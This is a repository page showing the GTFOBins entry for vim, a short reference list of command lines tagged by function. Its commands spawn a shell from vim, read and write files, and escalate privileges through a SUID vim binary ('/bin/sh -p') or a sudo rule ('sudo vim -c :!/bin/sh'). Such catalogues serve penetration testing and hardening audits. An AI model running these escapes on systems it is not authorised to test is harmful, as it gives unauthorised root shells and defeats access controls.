This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
0ba5df0cb984fd631efbf55a5adc8ec717720432
GTFOBins.github.io
/
_gtfobins
/
vim.md
AlessandroZ
7219385a05
add new ways
2018-08-17 17:16:09 +02:00
351 B
Raw
Blame
History
functions
functions
execute-interactive
file-write
file-read
suid-enabled
sudo-enabled
code
vim -c ':!/bin/sh'
code
vim :set shell=/bin/sh :shell
code
vim file_to_write w
code
vim file_to_read
code
./vim -c ':!/bin/sh -p'
code
sudo vim -c ':!/bin/sh'
Reference in New Issue
View Git Blame
Copy Permalink